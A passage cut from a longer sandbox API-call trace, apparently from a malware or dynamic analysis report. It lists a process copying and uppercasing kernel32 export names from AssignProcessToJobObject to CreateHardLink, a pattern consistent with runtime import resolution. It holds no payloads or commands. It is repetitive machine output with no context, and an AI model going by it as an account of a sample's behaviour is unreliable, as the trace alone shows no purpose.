lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.572] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.572] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.573] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.573] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.573] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.573] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.573] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.573] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.573] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.573] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.573] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.573] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.573] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.573] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.573] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.573] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.573] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.573] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.573] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.573] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.574] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.574] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.574] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.574] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.574] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.574] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.574] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.574] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.574] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.574] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.574] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.574] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.574] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.574] lstrlenA (lpString="BEEP") returned 4 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.574] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.574] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.574] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.574] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.574] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.575] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.575] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.575] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.575] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.575] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.575] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.575] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.575] lstrlenA (lpString="CANCELIO") returned 8 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.575] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.575] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.575] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.575] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.575] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.575] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.575] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.575] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.575] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.575] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.576] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.576] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.576] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.576] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.576] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.576] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.576] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.576] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.576] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.576] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.576] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.576] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.576] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.576] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.576] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.576] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.576] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.576] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.577] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.577] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.577] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.577] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.577] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.577] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.577] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.577] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.577] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.577] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.577] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.577] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.577] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.577] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.577] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.577] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.577] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.577] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.577] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.578] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.578] lstrlenA (lpString="COPYFILEA") returned 9 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.578] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.578] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.578] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.578] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.578] lstrlenA (lpString="COPYFILEW") returned 9 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.578] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.578] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.578] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.578] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.578] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.578] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.578] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.578] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.578] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.578] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.578] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.578] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.579] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.579] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.579] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.579] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.579] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.579] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.579] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.579] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.579] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.579] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.579] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.579] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.579] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.579] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.579] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.579] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.579] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.579] lstrcpyA (in: 